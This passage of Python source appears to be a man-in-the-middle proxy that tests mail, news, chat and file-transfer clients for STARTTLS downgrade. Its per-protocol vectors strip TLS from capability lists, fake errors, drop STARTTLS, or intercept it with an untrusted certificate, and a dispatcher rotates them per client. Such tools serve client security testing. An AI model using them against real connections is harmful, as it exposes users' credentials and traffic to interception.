session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n \r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"%s OK\"%id not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class FTP:\r\n _PROTO_ID = 21\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce AUTH TLS support\r\n 2) raise exception if client tries to negotiated AUTH TLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if session.outbound.sndbuf.strip().lower()==\"feat\" \\\r\n and \"AUTH TLS\" in data:\r\n features = (f for f in data.strip().split('\\n') if not \"AUTH TLS\" in f)\r\n data = '\\n'.join(features)+\"\\r\\n\"\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending AUTH TLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n session.inbound.sendall(\"500 AUTH TLS not understood\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"500 AUTH TLS not understood\\r\\n\")))\r\n data=None\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"234 OK Begin TLS negotation now\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"234 OK Begin TLS negotation now\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"234\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class NNTP:\r\n _PROTO_ID = 119\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if session.outbound.sndbuf.strip().lower()==\"capabilities\" \\\r\n and \"STARTTLS\" in data:\r\n features = (f for f in data.strip().split('\\n') if not \"STARTTLS\" in f)\r\n data = '\\n'.join(features)+\"\\r\\n\"\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"502 Command unavailable\\r\\n\") # or 580 Can not initiate TLS negotiation\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"502 Command unavailable\\r\\n\")))\r\n data=None\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"382 Continue with TLS negotiation\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"382 Continue with TLS negotiation\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"382\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class XMPP:\r\n _PROTO_ID = 5222\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n start = data.index(\"<starttls\")\r\n end = data.index(\"</starttls>\",start)+len(\"</starttls>\")\r\n data = data[:start] + data[end:] # strip starttls from capabilities\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\r\n #<failure/> or <proceed/>\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #session.inbound.sendall(\"<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\") # fake respone\r\n #data=None\r\n elif any(c in data.lower() for c in (\"</auth>\",\"<query\",\"<iq\",\"<username\")):\r\n rewrite.set_result(session, True)\r\n return data \r\n \r\n class StripInboundTLS:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) If starttls is required outbound, leave inbound connection plain - outbound starttls\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n start = data.index(\"<starttls\")\r\n end = data.index(\"</starttls>\",start)+len(\"</starttls>\")\r\n starttls_args = data[start:end]\r\n data = data[:start] + data[end:] # strip inbound starttls\r\n if \"required\" in starttls_args:\r\n # do outbound starttls as required by server\r\n session.outbound.sendall(\"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")\r\n logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(\"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")))\r\n resp_data = session.outbound.recv_blocked()\r\n if not resp_data.startswith(\"<proceed \"):\r\n raise ProtocolViolationException(\"whoop!? server announced STARTTLS *required* but fails to proceed. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\r\n #<failure/> or <proceed/>\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #session.inbound.sendall(\"<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\") # fake respone\r\n #data=None\r\n elif any(c in data.lower() for c in (\"</auth>\",\"<query\",\"<iq\",\"<username\")):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls \" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"<proceed \"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"</auth>\" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ACAP:\r\n #rfc2244, rfc2595\r\n _PROTO_ID = 675\r\n _REX_CAP = re.compile(r\"\\(([^\\)]+)\\)\")\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw in data for kw in (\"ACAP\",\"STARTTLS\")):\r\n features = Vectors.ACAP._REX_CAP.findall(data) # features w/o parentheses\r\n data = ' '.join(\"(%s)\"%f for f in features if not \"STARTTLS\" in f)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \" AUTHENTICATE \" in data: \r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall('%s BAD \"command unknown or arguments invalid\"'%id) # or 580 Can not initiate TLS negotiation\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr('%s BAD \"command unknown or arguments invalid\"'%id)))\r\n data=None\r\n elif \" AUTHENTICATE \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall('%s OK \"Begin TLS negotiation now\"'%id)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr('%s OK \"Begin TLS negotiation now\"'%id)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not \" OK \" in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \" AUTHENTICATE \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class IRC:\r\n #rfc2244, rfc2595\r\n _PROTO_ID = 6667\r\n _REX_CAP = re.compile(r\"\\(([^\\)]+)\\)\")\r\n _IDENT_PORT = 113\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw.lower() in data.lower() for kw in (\" cap \",\" tls\")):\r\n mangled = []\r\n for line in data.split(\"\\n\"):\r\n if all(kw.lower() in line.lower() for kw in (\" cap \",\" tls\")):\r\n # can be CAP LS or CAP ACK/NACK\r\n if \" ack \" in data.lower():\r\n line = line.replace(\"ACK\",\"NAK\").replace(\"ack\",\"nak\")\r\n else: #ls\r\n features = line.split(\" \")\r\n line = ' '.join(f for f in features if not 'tls' in f.lower())\r\n mangled.append(line)\r\n data = \"\\n\".join(mangled)\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return \r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #elif all(kw.lower() in data.lower() for kw in (\"cap req\",\"tls\")):\r\n # # mangle CAPABILITY REQUEST\r\n # if \":\" in data:\r\n # cmd, caps = data.split(\":\")\r\n # caps = (c for c in caps.split(\" \") if not \"tls\" in c.lower())\r\n # data=\"%s:%s\"%(cmd,' '.join(caps))\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'STARTTLS'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 691 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 691 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithNotRegistered:\r\n ''' 1) force server wrong state on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'You have not registered'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripCAPWithNotRegistered:\r\n ''' 1) force server wrong state on client sending CAP LS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"CAP LS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'You have not registered'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithSilentDrop:\r\n ''' 1) silently drop starttls command\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \" ident \" in data.lower():\r\n #TODO: proxy ident\r\n pass\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'STARTTLS'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\\r\\n\"%params)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not \" 670 \" in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n \r\nclass RewriteDispatcher(object):\r\n def __init__(self, generic_tls_intercept=False):\r\n self.vectors = {} # proto:[vectors]\r\n self.results = [] # [ {session,client_ip,mangle,result}, }\r\n self.session_to_mangle = {} # session:mangle\r\n self.generic_tls_intercept = generic_tls_intercept\r\n \r\n def __repr__(self):\r\n return \"<RewriteDispatcher ssl/tls_intercept=%s vectors=%s>\"%(self.generic_tls_intercept, repr(self.vectors))\r\n \r\n def get_results(self):\r\n return self.results\r\n \r\n def get_results_by_clients(self):\r\n results = {} #client:{mangle:result}\r\n for r in self.get_results():\r\n client = r['client']\r\n results.setdefault(client,[])\r\n mangle = r['mangle']\r\n result = r['result']\r\n results[client].append((mangle,result))\r\n return results\r\n \r\n def get_result(self, session):\r\n for r in self.get_results():\r\n if r['session']==session:\r\n return r\r\n return None\r\n \r\n def set_result(self, session, value):\r\n r = self.get_result(session)\r\n r['result'] = value\r\n \r\n def add(self, proto, attack):\r\n self.vectors.setdefault(proto,set([]))\r\n self.vectors[proto].add(attack)\r\n \r\n def get_mangle(self, session):\r\n ''' smart select mangle\r\n return same mangle for same session\r\n return different for different session\r\n try to use all mangles for same client-ip\r\n '''\r\n # 1) session already has a mangle associated to it\r\n mangle = self.session_to_mangle.get(session)\r\n if mangle:\r\n return mangle\r\n # 2) pick new mangle (round-robin) per client\r\n # \r\n client_ip = session.inbound.peer[0]\r\n client_mangle_history = [r for r in self.get_results() if r['client']==client_ip]\r\n \r\n all_mangles = list(self.get_mangles(session.protocol.protocol_id))\r\n if not all_mangles:\r\n return None\r\n new_index = 0\r\n if client_mangle_history:\r\n previous_result = client_mangle_history[-1]\r\n new_index = (all_mangles.index(previous_result['mangle'])+1) % len(all_mangles)\r\n mangle = all_mangles[new_index]\r\n \r\n self.results.append({'client':client_ip,\r\n 'session':session,\r\n 'mangle':mangle,\r\n 'result':None}) \r\n \r\n #mangle = iter(self.get_mangles(session.protocol.protocol_id)).next()\r\n logger.debug(\"<RewriteDispatcher - changed mangle: %s new: %s>\"%(mangle,\"False\" if len(client_mangle_history)>len(all_mangles) else \"True\"))\r\n self.session_to_mangle[session] = mangle\r\n return mangle\r\n \r\n def get_mangles(self, proto):\r\n m = self.vectors.get(proto,set([]))\r\n m.update(self.vectors.get(None,[]))\r\n return m\r\n \r\n def mangle_server_data(self, session, data):\r\n data_orig = data\r\n logger.debug(\"%s [client] <= [server] %s\"%(session,repr(data)))\r\n if self.get_mangle(session):\r\n data = self.get_mangle(session).mangle_server_data(session, data, self)\r\n if data!=data_orig:\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(data)))\r\n return data\r\n \r\n def mangle_client_data(self, session, data):\r\n data_orig = data\r\n logger.debug(\"%s [client] => [server] %s\"%(session,repr(data)))\r\n if self.get_mangle(session):\r\n #TODO: just use the first one for now\r\n data = self.get_mangle(session).mangle_client_data(session, data, self)\r\n if data!=data_orig:\r\n logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(data)))\r\n return data\r\n \r\n def on_recv_peek(self, s_in, session):\r\n if self.generic_tls_intercept:\r\n # forced by cmdline-option\r\n return Vectors.GENERIC.Intercept.on_recv_peek(session, s_in)\r\n elif hasattr(self.get_mangle(session), \"on_recv_peek\"):\r\n return self.get_mangle(session).on_recv_peek(session, s_in)\r\n \r\ndef main():\r\n from optparse import OptionParser\r\n ret = 0\r\n usage = \"\"\"usage: %prog [options]\r\n \r\n example: %prog --listen 0.0.0.0:25 --remote mail.server.tld:25 \r\n \"\"\"\r\n parser = OptionParser(usage=usage)\r\n parser.add_option(\"-q\", \"--quiet\",\r\n action=\"store_false\", dest=\"verbose\", default=True,\r\n help=\"be quiet [default: %default]\")\r\n parser.add_option(\"-l\", \"--listen\", dest=\"listen\", help=\"listen ip:port [default: 0.0.0.0:<remote_port>]\")\r\n parser.add_option(\"-r\", \"--remote\", dest=\"remote\", help=\"remote target ip:port to forward sessions to\")\r\n parser.add_option(\"-k\", \"--key\", dest=\"key\", default=\"server.pem\", help=\"SSL Certificate and Private key file to use, PEM format assumed [default: %default]\")\r\n parser.add_option(\"-s\", \"--generic-ssl-intercept\",\r\n action=\"store_true\", dest=\"generic_tls_intercept\", default=False,\r\n help=\"dynamically intercept SSL/TLS\")\r\n parser.add_option(\"-b\", \"--bufsiz\", dest=\"buffer_size\", type=\"int\", default=4096)\r\n \r\n all_vectors = []\r\n for proto in (v for v in dir(Vectors) if not v.startswith(\"_\")):\r\n for test in (v for v in dir(getattr(Vectors,proto)) if not v.startswith(\"_\")):\r\n all_vectors.append(\"%s.%s\"%(proto,test))\r\n parser.add_option(\"-x\", \"--vectors\",\r\n default=\"ALL\",\r\n help=\"Comma separated list of vectors. Use 'ALL' (default) to select all vectors, 'NONE' for tcp/ssl proxy mode. Available vectors: \"+\", \".join(all_vectors)+\"\"\r\n \" [default: %default]\")\r\n # parse args\r\n (options, args) = parser.parse_args()\r\n # normalize args\r\n if not options.verbose:\r\n logger.setLevel(logging.INFO)\r\n if not options.remote:\r\n parser.error(\"mandatory option: remote\")\r\n if \":\" not in options.remote and \":\" in options.listen:\r\n # no port in remote, but there is one in listen. use this one\r\n options.remote = (options.remote.strip(), int(options.listen.strip().split(\":\")[1]))\r\n logger.warning(\"no remote port specified - falling back to %s:%d (listen port)\"%options.remote)\r\n elif \":\" in options.remote:\r\n options.remote = options.remote.strip().split(\":\")\r\n options.remote = (options.remote[0], int(options.remote[1]))\r\n else:\r\n parser.error(\"neither remote nor listen is in the format <host>:<port>\")\r\n if not options.listen:\r\n logger.warning(\"no listen port specified - falling back to 0.0.0.0:%d (remote port)\"%options.remote[1])\r\n options.listen = (\"0.0.0.0\",options.remote[1])\r\n elif \":\" in options.listen:\r\n options.listen = options.listen.strip().split(\":\")\r\n options.listen = (options.listen[0], int(options.listen[1]))\r\n else:\r\n options.listen = (options.listen.strip(), options.remote[1])\r\n logger.warning(\"no listen port specified - falling back to %s:%d (remote port)\"%options.listen)\r\n options.vectors = 